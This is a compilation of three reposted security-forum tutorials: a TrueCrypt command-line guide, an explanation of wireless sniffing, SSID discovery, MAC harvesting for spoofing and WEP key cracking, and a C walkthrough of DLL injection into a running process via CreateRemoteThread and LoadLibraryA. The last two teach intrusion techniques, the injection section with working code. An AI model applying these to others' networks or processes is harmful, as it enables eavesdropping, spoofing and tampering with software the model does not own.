to be encrypted. For instance, lets take the avobe example, you have a partition called /dev/sda4 and is about 20GB of space; You can encrypt the partition entirely, not just create a file on it, in the same way, if you have only one disk with no partitions at all, you can encrypt it completely. Those can be real volumes. Removable volumes: This are just any kind of removable device where you can save data, like USB Hardrive, flashdrives and such. Every truecrypt volume needs a path (like /media/sda4/private) which is going to be mapped then to a device in /dev, if it's a virtual volume, it will be mapped to /dev/mapper/truecryptN, this path is where the truecrypt volume is and is importand (demanded) to indicate it in order to create the volume. To use the volume, besides a known path, is need a mount point (like /mnt/something or /media/data), this is only used once the truecrypt volume have been created and mapped to device in /dev, this mount point is where you actually are going to save or access the data that is in the truecrypt volume, no worries if you don't catch this yet, you'll understand it later As I said before, this guide is about using truecrypt from the console in Linux systems, for a guide about the use with the graphical interface please refer to the Official user's guide: TrueCrypt - Free Open-Source Disk Encryption Software - Documentation - Tutorial 1/5 From the command line, truecrypt has many parameters that can be used to create your volumes, I won't cover every possible use of those parameters so you can check all the options avialable issuing the command: root@root [~]# truecrypt --help However, if you've been following me so far, you should remember that I talked about the interactive mode in the advantages of truecrypt section. The great thing about this mode of operation is that you don't really need to know any other parameter in order to create a truecrypt volume, from the command line, the interactive mode is called like this: root@root [~]# truecrypt --interactive In this mode, the program will ask you everything that it needs to know to create a volume, the volume path, a password, a hash, a key file (optional), and other important stuff. This mode however can be called by truecrypt itself if the user issued some parameters but not every required to create the volume, for instance, lets say we create a volume called mystuff with the password uid0R00tS3c, the command could be something like this: root@root [~]# truecrypt --password uid0R00tS3c --create /media/hda3/private The thing with the above command is that it lacks of other important information, for example, the hash that should be used for the password, in this case, truecrypt will notice that not all the need parameters have been issued from the beginning so it will start to ask the user for all the missing data. Moving on, using truecrypt is incredible easy, mostly thanks to the interactive mode. Starting from here, I'll be issuing several ways about how to use the tool to fit better your needs, feel free to ask or add whatever you think will improve this guide. For convenience, I'll be using two example disks, one is a partition /dev/hda2 that is mounted on /media/data, and the other will be an entire disk /dev/sda1 that will be mounted on /media/mydisk Create a volume called 'private' on /dev/hda2: root@root [~]# truecrypt --create /media/data/private Create a volume called 'private' using the password R00tS3c: root@root [~]# truecrypt --password R00tS3c --create /media/data/private Create a volume called 'private' using password and the algorithm Twofish: root@root [~]# truecrypt --password R00tS3c --encryption Twofish --create /media/data/private Create a volume called 'private' with a blank password but using a key file: root@root [~]# truecrypt --password '' --keyfile /home/rootsec/logo.jpg --create /media/data/private Create a volume called 'private' with password, using cascade encryption and a directory as key file: root@root [~]# truecrypt --password R00tS3c --keyfile /home/rootsec/documents --encryption AES-Twofish-Serpent --create /media/data/private Create a volume called 'private' with password, key file, cascade and hash: root@root [~]# truecrypt --password R00tS3c --keyfile /home/rootsec/mymovie.mpg --encryption Twofish-Serpent --hash SHA-1 --create /media/data/private Create a key file called 'useme' using RIPEMD-160 hash root@root [~]# truecrypt --keyfile-create --hash RIPEMD-160 /home/rootsec/useme Add a key file to an existent volume called 'private': root@root [~]# truecrypt --keyfile-add --change /home/rootsec/useme /media/data/private Create a volume with an specific filesystem: root@root [~]# truecrypt --filesystem ext3 --create /media/data/private Create a volumen called 'private' with password and using a file as random generator instead of a hash: root@root [~]# truecrypt --password R00tS3c --random-source /home/rootsec/drums.mp3 --create /media/data/private Mount a volume called 'private' in /media/mystuff/: root@root [~]# truecrypt /media/data/private /media/mystuff Pass specific options to mount: root@root [~]# truecrypt --mount-options ro /media/data/private /media/mystuff The above will mount the truecrypt volume 'private' on /media/mystuff as read only Create a volume with fixed space: root@root [~]# truecrypt --size 200MB --create /media/data/private The size can be used in KB, MB or GB, always put any of this, just putting the number will return an error. Create a hidden volume: root@root [~]# truecrypt --create /media/mydisk root@root [~]# truecrypt --type hidden --size 2GB --create /media/mydisk As I said before, hidden volumes are created inside normal volumes, this is way we need to create a normal value before. In this case (and if you remember) /media/mydisk is where the example /dev/sda1 disk is mounted, suppose that this disk is about 100GB, therefore, what we're doing here is create a hidden volume of 2GB inside that disk of 100GB. Every truecrypt volume is mapped to /dev/mapper/truecryptN where 'N' is a number starting from 0 and assigned by avialability, lets say that you create one truecrypt volume, then it'll be mapped to /dev/mapper/truecrypt0, then you create another one, this will be mapped to /dev/mapper/truecrypt1, then you create another that will be mapped to /dev/mapper/truecrypt2 and so on. You can change this numbers for other if you like to avoid the automatic mapping. This is usefull when you have several truecrypt volumes and you need to know which is what: root@root [~]# truecrypt --device-number 10 --create /media/data/private This will map the truecrypt volume to /dev/mapper/truecrypt10 Change a volume: Imagine that you create the volume private with an space of 10GB but know you see that you don't need it to be so big, so lets change that: root@root [~]# truecrypt --size 5GB --change /media/data/private When you're doing this, you don't need to specify the older values, just the new ones, so if we want to change the password will use: root@root [~]# truecrypt --password R00tS3c2 --change /media/data/private List all mapped (thus mounted) truecrypt volumes: root@root [~]# truecrypt --list Unmount a truecrypt volume: root@root [~]# truecrypt --dismount /media/data/private Unmount all truecrypt volumes at once: root@root [~]# truecrypt --dismount Check the description of a volume: root@root [~]# truecrypt --properties /media/data/private Remove a truecrypt volume: If it's a virtual volume, all you need to do is erase the file, for instance, if I wanted to remove the 'private' volume created from previous examples, I'll use: root@root [~]# rm /media/data/private If you encrypted an entire partition or disk and you don't want it encrypted anymore, the only thing you can do is format. Finally, if you want to save or access data in a truecrypt volume, all you have to do is mount it and save the data to the mount point, for instance, if I created the volume 'private' and mounted it in /media/mystuff, all I need to do in order to save my information in the encrypted volume is to copy (or move) the data to /media/mystuff. Common problems There are several common problems while using truecrypt but most of them are related to the lack of kernel support, but for a matter of completeness, this are the most common errors: - Mount Failed: Yeah, this is all you'll see while trying to mount the volume This error is caused because device mapper support or FUSE (depending on truecrypt's version used) isn't active. -Wrong FS: So, you're going to mount the volume and it shows: mount: wrong fs type, bad option, bad superblock on /dev/mapper/truecrypt0, missing codepage or other error In some cases useful info is found in syslog - try dmesg | tail or so When creating volumes (unless it's used the --filesystem option), truecrypt create those volumes using 'auto' filesystem which, for linux porpuses doesn't work for nothing, so, in order to avoid this error you'll need to create a filesystem in the volume like this: root@root [~]# truecrypt --device-number 20 /media/data/private /media/mystuff && mkreiserfs /dev/mapper/truecrypt20 To actually create a file system on the truecrypt device, first its need to be mapped, that's why you need to mount it first and instally after create the file system you want, I used reiserfs but you can use whatever you like. The '--device-number' option is optional, I used becuase is better if you want to control what device you're going to format. -No free loopback device available: This error is because the lack of loop device support in the kernel (Device Drivers --> Block Devices --> Loopback support). Conclusion So we've come to the end of this guide, I hope you liked, I try to be the more specific I could and try to reach those who knows the toold and those who don't, however, this is not an strict guide, meaning that you can discuss, share, provide more examples of use or anything you like Regards Sursa: Truecrypt's Guide - r00tsecurity

Wireless Network Sniffing Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. Sniffing is the act by a machine S of making copies of a network packet sent by machine A intended to be received by machine B. Such sniffing, strictly speaking, is not a TCP/IP problem, but it is enabled by the choice of broadcast media, Ethernet and 802.11, as the physical and data link layers. Sniffing has long been a reconnaissance technique used in wired networks. Attackers sniff the frames necessary to enable the exploits described in later sections. Sniffing is the underlying technique used in tools that monitor the health of a network. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections. It is easier to sniff wireless networks than wired ones. It is easy to sniff the wireless traffic of a building by setting shop in a car parked in a lot as far away as a mile, or while driving around the block. In a wired network, the attacker must find a way to install a sniffer on one or more of the hosts in the targeted subnet. Depending on the equipment used in a LAN, a sniffer needs to be run either on the victim machine whose traffic is of interest or on some other host in the same subnet as the victim. An attacker at large on the Internet has other techniques that make it possible to install a sniffer remotely on the victim machine. Passive Scanning Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all. Several modes of a station permit this. There is a mode called RF monitor mode that allows every frame appearing on a channel to be copied as the radio of the station tunes to various channels. This is analogous to placing a wired Ethernet card in promiscuous mode. This mode is not enabled by default. Some wireless cards on the market today have disabled this feature in the default firmware. One can buy wireless cards whose firmware and corresponding driver software together permit reading of all raw 802.11 frames. A station in monitor mode can capture packets without associating with an AP or ad-hoc network. The so-called promiscuous mode allows the capture of all wireless packets of an associated network. In this mode, packets cannot be read until authentication and association are completed. An example sniffer is Kismet (Kismet). An example wireless card that permits RF monitor modes is Cisco Aironet AIR-PCM342. Detection of SSID The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled. On a number of APs, it is possible to configure so that the SSID transmitted in the Beacon frames is masked, or even turn off Beacons altogether. The SSID shown in the Beacon frames is set to null in the hope of making the WLAN invisible unless a client already knows the correct SSID. In such a case, a station wishing to join a WLAN begins the association process by sending Probe Requests since it could not detect any APs via Beacons that match its SSID. If the Beacons are not turned off, and the SSID in them is not set to null, an attacker obtains the SSID included in the Beacon frame by passive scanning. When the Beacon displays a null SSID, there are two possibilities. Eventually, an Associate Request may appear from a legitimate station that already has a correct SSID. To such a request, there will be an Associate Response frame from the AP. Both frames will contain the SSID in the clear, and the attacker sniffs these. If the station wishes to join any available AP, it sends Probe Requests on all channels, and listens for Probe Responses that contain the SSIDs of the APs. The station considers all Probe Responses, just as it would have with the non-empty SSID Beacon frames, to select an AP. Normal association then begins. The attacker waits to sniff these Probe Responses and extract the SSIDs. If Beacon transmission is disabled, the attacker has two choices. The attacker can keep sniffing waiting for a voluntary Associate Request to appear from a legitimate station that already has a correct SSID and sniff the SSID as described above. The attacker can also chose to actively probe by injecting frames that he constructs, and then sniffs the response as described in a later section. When the above methods fail, SSID discovery is done by active scanning Collecting the MAC Addresses The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames. There are two reasons why an attacker would collect MAC addresses of stations and APs participating in a wireless network. (1) The attacker wishes to use these values in spoofed frames so that his station or AP is not identified. (2) The targeted AP may be controlling access by filtering out frames with MAC addresses that were not registered. Collecting the Frames for Cracking WEP The goal of an attacker is to discover the WEP shared-secret key. Often, the shared key can be discovered by guesswork based on a certain amount of social engineering regarding the administrator who configures the wireless LAN and all its users. Some client software stores the WEP keys in the operating system registry or initialization scripts. In the following, we assume that the attacker was unsuccessful in obtaining the key in this manner. The attacker then employs systematic procedures in cracking the WEP. For this purpose, a large number (millions) of frames need to be collected because of the way WEP works. The wireless device generates on the fly an Initialization Vector (IV) of 24-bits. Adding these bits to the shared-secret key of either 40 or 104 bits, we often speak of 64-, or 128-bit encryption. WEP generates a pseudo-random key stream from the shared secret key and the IV. The CRC-32 checksum of the plain text, known as the Integrity Check (IC) field, is appended to the data to be sent. It is then exclusive-ORed with the pseudo-random key stream to produce the cipher text. The IV is appended in the clear to the cipher text and transmitted. The receiver extracts the IV, uses the secret key to re-generate the random key stream, and exclusive-ORs the received cipher text to yield the original plaintext. Certain cards are so simplistic that they start their IV as 0 and increment it by 1 for each frame, resetting in between for some events. Even the better cards generate weak IVs from which the first few bytes of the shared key can be computed after statistical analyses. Some implementations generate fewer mathematically weak vectors than others do. The attacker sniffs a large number of frames from a single BSS. These frames all use the same key. The mathematics behind the systematic computation of the secret shared key from a collection of cipher text extracted from these frames is described elsewhere in this volume. What is needed however is a collection of frames that were encrypted using ?mathematically-weak? IVs. The number of encrypted frames that were mathematically weak is a small percentage of all frames. In a collection of a million frames, there may only be a hundred mathematically weak frames. It is conceivable that the collection may take a few hours to several days depending on how busy the WLAN is. Given a sufficient number of mathematically weak frames, the systematic computation that exposes the bytes of the secret key is intensive. However, an attacker can employ powerful computers. On an average PC, this may take a few seconds to hours. The storage of the large numbers of frames is in the several hundred-mega bytes to a few giga bytes range. An example of a WEP cracking tool is AirSnort ( AirSnort Homepage ). Detection of the Sniffers Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected. Sursa: Wireless Network Sniffing - r00tsecurity

[C] Dll Injection Ok Dll Injection is the process in which a dll is loaded into the memory space of a running process. This injected dll then can either hook or run or change memory values. It can do this because it is running in that processes memory space. Now the first thing to do is find the processes. Ok to find a certain process there a few ways but this is the easiest. To do this we need the help of some windows functions. HANDLE WINAPI CreateToolhelp32Snapshot( __in DWORD dwFlags, __in DWORD th32ProcessID ); BOOL WINAPI Process32First( __in HANDLE hSnapshot, __inout LPPROCESSENTRY32 lppe ); BOOL WINAPI Process32Next( __in HANDLE hSnapshot, __out LPPROCESSENTRY32 lppe ); Ok all of these functions are found in Tlhelp32.h Ok now these functions take structures that will be used to walk through a snapshot or list of the running processes on the computer at the time. Ok to explain what you have to do to get these to work for u is this. if you notice that CreateToolHelp32Snapshot returns a handle. This handle points to the snapshot(list) of the processes. The flags just needs to be set to TH32CS_SNAPPROCESS and the th32ProcessID to 0 example code: HANDLE snapshot = CreateToolhelp32Snapshot( TH32_SNAPPROCESS, 0 ); Ok now to put this snapshot to use you need to use the Process32First and Process32Next functions. Now these contain another structure. PPROCESSENTRY32 This structure holds the process info most notably the exe that was used to create this process. Theres other things this can beuse for but there not in this TUT. Ok now to get the first process you call Process32First PROCESSENTRY32 sentry; Process32First( snapshot, &sentry ); Ok this could use some error checking but what ever. Ok this will return the first process in the list. Now to check if this is the exe you need to compare the exe name with the one you want to find. strcmp( sentry.szExeFile, exe ); Now if this returns 0 then you found the process and you can get the processID like this. sentry.th32ProcessID; Ok if the first one is not the right one then you will have to loop through the list. To do this you can use any kind of loop you want, but a while is the best. Now to loop through the list you use Process32Next (it returns true or false) while( Process32Next( snapshot, &sentry ) { if( strcmp( sentry.szExeFile, exe ) == 0 ) break; } ok this puts the process ID in the sentry structure and you get it like before. Ok thats all the info you need to be able to write a function to find a process based on a name. Now for the actual injection method. Ok the method that will be used is done with CreateRemoteThread HANDLE WINAPI CreateRemoteThread( __in HANDLE hProcess, __in LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in LPVOID lpParameter, __in DWORD dwCreationFlags, __out LPDWORD lpThreadId ); Ok this needs alittle explanation. To get this too work it helps to understand whats needed to get this to get the process to load and run our dll. hProcess is the process that the dll will be injected into. lpThreadAttributes is not need can be set to NULL dwStackSize is not needed also this is 0 lpStartAddress is the address of the function that this thread will call when its created lpParameter is the paramete to be passed to the function on thread creation dwCreationFlags is not need as the thread should run as soon as its create so set this to 0 lpThreadId this is not needed unless error checking is needed. Ok theres really only 3 parametes in that function that are important. They are hProcess, lpStartAddress, lpParameter Ok a few things needs to be said about this. This will allow us to create a thread ( after the process is opened ) and this thread will be use to load our dll. Now the only way a program can dynamically load a dll into itself is with the HANDLE LoadLibraryA( const char *lib ) Ok this is the ascii version of the function and it will be used. Ok this function will load a dll into a process's memory space and run the DllMain in the dll. Now to make this usefull we need to call it in the other process and not in ours. To do this we need one other bit of information. Mainly the Address of this function. This address is what will be passed to the CreateRemoteThread function. Now you can probley guess what the lpParameter is gonna be. But before that lets figure out how to get the address of the function. Ok this needs another windows function FARPROC GetProcAdress( HMODULE mod, const char *func ) Ok this is the function it need to take a HMODULE(HANDLE) to the module you want to find the address of the function. The func is the name of the function (LoadLibraryA) and then you need to get the address. Now the best way to store this address is in a LPVOID so this is whats gonna happen. So to get the handle to the module that contains the function were looking for (LoadLibraryA) we need to get this. Another name for module is a DLL so we can use the LoadLibrary function to get a HANDLE to the module (dll) like so: HANDLE kernel = LoadLibrary( "kernel32.dll" ); Ok then you can use the GetProAddress and get the LoadLibraryA address. LPVOID loadlib = (LPVOID)GetProcAddress( kernel, "LoadLibraryA" ); Ok now that we have the address of the function we need to inject(load) our dll into another process. Now One more thing is needed. Notice the parameter for LoadLibrary takes a string. This string needs to be passed to it or it won't work To do this though we can't just have the string in our process and try passing it to the function as this will cause a error. We need to get the string into the other process. Now to do this we have to use some more windows functions. HANDLE WINAPI OpenProcess( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); LPVOID WINAPI VirtualAllocEx( __in HANDLE hProcess, __in_opt LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flAllocationType, __in DWORD flProtect ); BOOL WINAPI WriteProcessMemory( __in HANDLE hProcess, __in LPVOID lpBaseAddress, __in LPCVOID lpBuffer, __in SIZE_T nSize, __out SIZE_T* lpNumberOfBytesWritten ); Ok the first gets a handle to the process with the passed ID, it also specifies what access you want. The next one allocates memory in the opened process. The last writes to this allocated memory. Ok this is kind of the point where all the tut starts to come together. Ok first use the function to get a process ID from the exe name and pass it to openprocess like so. HANDLE proc = OpenProcess( (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, GetProcIDfromName( SomeEXE ) ); Ok now have a handle to this process you want to inject the dll into. Now you need to allocate space for the dll path (this needs to be the complete full path). To do this call VirtualAllocEx and store the return value in a LPVOID. LPVOID tempmem = VirtualAllocEx( proc, NULL, strlen( fulldllpath ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE ); Ok now that memory has been allocated for the dll path we can write it to this memory. This will be done with WriteProcessMemory we will pass the LPVOID that was return from VirtualAllocEx as the address of the memory block. WriteProcessMemory( proc, (LPVOID)tempmem, fulldllpath, strlen( fulldllpath ), NULL ); ok that was easy. Finally the injection can happen. Now we go back to the CreateRemoteThread function and pass in all the info we just spent getting. CreateRemoteThread( proc, NULL, 0, (LPTHREAD_START_ROUTINE)loadlibaddr, (LPVOID)tempmem, 0, NULL ); If everything went as planned the dll will be loaded into the remote process or inject. With this the dll can set hooks, edit memory, extend or mess with the process. Ok with CreateRemoteThread we passed the process ID that was found with our helper function. The address of the LoadLibraryA function from the kernel32.dll. And the address of the memory we wrote the path of the dll to be injected. Well thats really it. enjoy, elchupathingy. Sursa: [C] Dll Injection - r00tsecurity